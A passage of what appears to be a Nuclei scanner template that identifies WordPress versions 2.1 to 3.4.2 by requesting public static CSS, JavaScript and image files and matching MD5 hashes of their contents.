"(\"9dc0dddf639df1f6f51abaa804dc7090\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"780263c635eb4e336dbc1dc6f2396abd\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"adcfdb7c1dbd61eeb89a208c1bc0fa0b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/dashboard-rtl.dev.css" - matchers: - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"c42cf458a0dce157c789d3ea0d537f3d\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"d57884f6c537a8aae2d94f6691a88029\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"ee25e4e0ed7f4daeea286350b91d0656\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/editor-buttons.css" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"3105c2683699bc806904333deb52af38\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/editor-buttons.dev.css" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"3e0233087e54900ed8cac50e14fde27e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin.dev.js" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"d30181a63c565e4468e6fefab0d58bc6\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"1381684254b5110789ee3462bd1dba96\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.dev.js" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"63d50833c289dca64b69d94cd40ac8ca\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"80d691c90f4f53d4b8f10b7254a0aa6b\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"66ff790001351132589bb63a37a56351\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"7e2136d5e077774bb677dcf3576cb203\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/css/editimage-rtl.css" - matchers: - - type: dsl - name: 2.6 - 3.3.3 - dsl: - - "(\"9afbd20302a56bc9e0d7bcc5c3c61c7c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin.dev.js" - matchers: - - type: dsl - name: 3.1 - 3.3.3 - dsl: - - "(\"9dd84d5a159ba243f18568c223a534b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin.dev.js" - matchers: - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"48784cf4970b78b03ce5d6da9cac5621\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"019b69e24bd4ccfb538504501851c2cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.dev.js" - matchers: - - type: dsl - name: 2.9 - 3.3.3 - dsl: - - "(\"b187c382589dac1006d284967d24c62d\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"208d2715778f5e1f2086e5efba4be695\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/gallery.png" - matchers: - - type: dsl - name: 2.7 - 3.3.3 - dsl: - - "(\"1f35ba36cb43f1c5382a13e6941483df\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.dev.js" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"c0c35687371b7c544d0b446e297a93d0\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"b13382c0430cc27678f686cff7247fd3\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"818c96b9e6a8a38edb7bd84ed9df9360\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"801c8ecf84caad5d51283aa273d9e5c6\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"b1a44bb492d150ba2fc3ef091649a6ac\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/embedded.png" - matchers: - - type: dsl - name: 2.9 - 3.3.3 - dsl: - - "(\"1fad35f87373d2784de6c125ce3942ed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/more_bug.gif" - matchers: - - type: dsl - name: 2.5 - 3.3.3 - dsl: - - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/page_bug.gif" - matchers: - - type: dsl - name: 2.5 - 3.3.3 - dsl: - - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/css/content.css" - matchers: - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"585d53dec7b08788b4e495da6814eacf\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"be695b0573d9ef0b904587313fd6096d\" == md5(body))" - - type: dsl - name: 2.5 - 2.8.6 - dsl: - - "(\"947de1cd730bff4b3cea0bc8c5ec1178\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/gray-star.png" - matchers: - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"bea6d3557d9c1b9e3d9044aa685f72c3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/star.png" - matchers: - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"6c8273e7a485fb777314ea9d0b5a103b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/new-feature-pointer.png" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"b9a135aa45236114cfcb912588bbaf41\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/admin-flyouts.png" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ac4ce1abdb2814481f88b1d5289138b8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/welcome-screen.png" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"cbdc66a4da2be082ac6c7c35670de6ce\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/drag-and-drop.png" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"259572a5fa2e3ed4a48411e28fe7186f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/coediting.png" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"d335598bfe9f059385fd1afdb9680757\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/help-screen.png" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a8c952481d58a5263790cce713e2b7c4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screenshots/media-icon.png" - matchers: - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"159783652897f6b290d9a56a60f37492\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/logo-login.png" - matchers: - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"f3473a97f55aac098f90e978181ae4d1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/upload.png" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"64f033ed3bb680dba682829fe46ac34a\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"11904681d8fc3a10d44a96acec2d9044\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-pointer.dev.css" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"1585519d5f7f27cd872e9c1f74e7157a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.dev.css" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"c9a392cb6e9f1715c9150031b0f0fea3\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"4f5c825f9860c328cdd1b5b878971264\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"3566f3b34a5a24f0763900dd3cf410fc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.dev.css" - matchers: - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"773b68ebb25a383788c7080043b0350b\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"1f8d37bc83dd53b154ae924c0cd040ec\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"bf615625d772465e039ff5391650ca0a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/admin-bar.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"10fee05fc3a9b14be7bf83b0f5669b48\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"266a1b0885cfe3ec9d60667e6a15da9b\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"ddf7d05d4beb316f0d4a80f23ffb3225\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/hoverIntent.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"73e23cc2a686c50a9f80746d5fde8eb5\" == md5(body))" - - type: dsl - name: 2.8 - 3.3.3 - dsl: - - "(\"d0d5fed467b2ac6c1b79e88ec7a8b514\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/handlers.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"5890cd4d95125931f0e0650601e2a647\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.3.3 - dsl: - - "(\"92b374ca4bf0f5dfde86ea01725b5d2c\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"7f80b44718dd1d025d401549b5a00685\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/builder.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"33e43995385a54d175516d8ede7d75b9\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"92cc9bddf6afcff5e641eeba9e3eacc0\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"f2abb2f2083b5d2a9e2ab1d821fc72bf\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"5cf5f6ccca0fa4c4c8a0428e9240b81a\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"6b737ecca99b73e70149195653627e4a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/effects.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"0efe4a1f7374463232bc598926a7b4d4\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"29a97dc0bf45c93560b28421843b75c2\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"ab48b4f30f63f701e491ba9bb1b5451d\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"be6dba6cd4a57fc1dade9b547fc614d9\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"5723ef231fd913fa981a3dc5a2492131\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/scriptaculous.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"f333a7a32a2b7549853d606e50bee5d5\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"b4c44f312deb6cd7f76f8684276da04c\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"1bfeb4bd1d53b1951c25b51523471e1a\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"211d955609da0b228a65487384b95722\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"ba6e48c926618bb08b6a5853efeb2463\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/unittest.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"3ef5747adec5039f18816f2b2fb8cd6b\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"b41840d00193331f0fb68fc54f1085c6\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"3ae6f077da09244c08349e8920eee880\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"9ffcc3a22dbfeb9e5665247f376deb76\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"19e5e5117633a8bc41724d0bc67e4162\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/slider.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"7f9ed11dfea85c958a7fee63515ff930\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"e38b722aa3e5bf6f52c521d9fca0235f\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"8baa57d7d4382b95dcb953e7132d31c4\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"a35f869479bb76b2d0de3aaa808ead5e\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"e1169fc74b36a0c1529a15a85feda299\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/dragdrop.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"7b4c10c6a6783b1d60625ff4b0b34b3e\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"e07ef5d6af2980f8e72cd74e67690a54\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"f5fd2822d8577d30cb998566645f1fe6\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"f41cfdb65270e6f50eb1cce7cee52902\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"2a8ba7d2631729bb53b42530d522ff08\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/MIT-LICENSE" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"4af5bdb483496e1c4db85a3fb03b5b6e\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"b72c811c3e4b902332903aacd47eef47\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"9f3d5ea8e5c0e7c721a40dc22ea20c72\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"b86a0a3506f37117d1540c359b1a7ed8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/wp-scriptaculous.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"360573487f5e7830b54f27af815a0a58\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"1b6a98a2e2b55d90a88524faea79f0a8\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"1bfeb4bd1d53b1951c25b51523471e1a\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"c0deff8348d644fe7727daa4415de64d\" == md5(body))" - - type: dsl - name: 2.1.1 - 2.1.3 - dsl: - - "(\"7a44c05d1d583369275dba694ff14a3f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/sound.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"69ffb734e10e8d1ef0e7a251ec0ca539\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"d654e517c3813d9a21280b6c2e58a8db\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"5a58260c9ccef7a67ae2e4f7d07f9ea9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/controls.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"8df54b04b3a05b5a5d68643cde67f77b\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"fcf61880c81c69a8c892020de19216e6\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"6e5f2d4fd9802a5cbc2e7ff7cf6674ec\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"3caf5091b68f3a6afaf881744509d4c6\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"23cef7404ffe6d410b0c235433771d51\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/prototype.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"965fe52b851d8ff3c2b915ada9fb273f\" == md5(body))" - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"bab4179aef164e96e866b03ac432bdf7\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"e4d323d8dfe7260fe01cefe6143f094d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/autosave.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f62b83e650dce98e19b872eb43689298\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"af6a27d4947af4b7fdbfd0ed7c00d455\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"9aea40acf0c39e1ed27ce59b0e38576b\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"24373f9824e45b2c2e9e5c6286fe2f78\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"2b4fe432af9394459e60dbad48c11459\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"8ff33e244aaae79e1547003b03dffc3a\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"10cd5dfe482cfff61d7e628a81e61922\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-loader.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"96e5dedaddcfa2e0514f29bf1dd402c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/comment-reply.dev.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"20ef5771571f1be483869066b2830c2f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wplink.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"dc327b2e93ae86b3be62a536379457e9\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"23e5ee4b8b9d543add71e8191cf3c90e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tw-sack.dev.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"b989a5bd84f6ebcbc1393ec003e6e991\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-ajax-response.dev.js" - matchers: - - type: dsl - name: 2.9 - 3.4.2 - dsl: - - "(\"54b536447cd644bcafa51a568be8c54e\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"ddc65b357dbc1b10b4a9eeb97a4bd704\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/quicktags.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"191ea92b9cdd1a23d48ad67fba256f0a\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"2f4dbf99b6555cff7e2bceda7986b269\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"1435292e5022e57170c6bd710fffb085\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"5a299970e59a4155990a34066e4bd41a\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"0ee241770ed514d28020ddedc9db2326\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/handlers.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"793ff9921f096583ba52f8606ec79f4c\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"95eb0e3071c8eb18628fcd952e4b6384\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"4c158d390795fa26ae94a33f62c02885\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"59ff0a965a09179e90282c94f4eb3098\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"6659d58b56b0aa9121f88dd048acee1c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"1210dad363fcd0a43dc28244b69369f9\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"e18e58c9f23c19a9b0233af61e1f5308\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"820f80306571dbe0a1deb0b63496d85f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"5291cf4f8f19bd8692befbebc2761440\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"ec1d98b35884ecc9de0e6f058fefe6b8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.dev.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"ec1d98b35884ecc9de0e6f058fefe6b8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.dev.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a7ad102b68229e728863325d0efec72e\" == md5(body))" - - type: dsl - name: 2.8 - 3.3.3 - dsl: - - "(\"dfdd8d2cc9be955dbb8dd14aae1daf40\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.fold.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f69b3b79f4bcf7469073043135cf6307\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"59cdbee6307a4fce031bbd89009a82e8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.core.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"6c97a90bce71c640c4a78753a4c589ec\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"d5112dfa4dd8e8f8067081cbd8be3ae3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.highlight.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"42313e472b34be79275d6006b8530d33\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"34b4be2a83a8eebb16ac5297a7dcfde9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.explode.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"8ac1dfce432d3647b3ff1ebe8031ce6f\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"d8ba624f5336b14a49f56ca304982cb7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.blind.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"10b40853994ade768b452861bb0896c4\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"1e2a8b2eed5b1b2f24e12adc436c2b44\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.bounce.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"abd026273ad30b0122973bd085e4d9be\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"873b92422573849fad6cccb726c2e6bc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.transfer.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"577573b3f3586e9f239a82b4066993fd\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"3c127931b63007c90efff1e507947ff6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.clip.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"bdc3cf35b8dbf9c95533a7041b7997a7\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"35ba32293d3a1074e2b5d17407a1cb66\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.fade.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"573626f9df72877a8255b4b7cdbaa6d2\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"bba378cc8a154be8b3af270b42d7143b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.pulsate.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"cf94d2a6a7f254ae983a859b96b22e48\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"fc421b7d814dddec5b97de420b2674c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.scale.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"40ca173ecd15c47c39fc04864a4ad9f5\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a1f7d2ad92d7a574ba40a6ae3efa8e10\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.drop.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"c78aae2ed48fe5c20e6f301d2121b506\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"e50bdec823723dac7508d2343559c598\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.shake.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"0f7eda61dce38226f959fe4128118b94\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"560554c3e186ad5ec2ce909a858257b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.slide.min.js" - matchers: - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f4fdf642ec7e0cab73ce242ef9789025\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"709c80dab78bcb4ea4b2344b0174c4cf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/suggest.dev.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"4da8fd7204488b2d4541a426c1d351ce\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"24afc2920f7ace150877a5bcbd39f409\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.dev.js" - matchers: - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"baa8747ae1cb2d15755733fa4f96f1b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-list-revisions.dev.js" - matchers: - - type: dsl - name: 3.0 - 3.4.2 - dsl: - - "(\"10b8adab39fa790c52bac5c59cead9a8\" == md5(body))" - - method: GET - path: - - 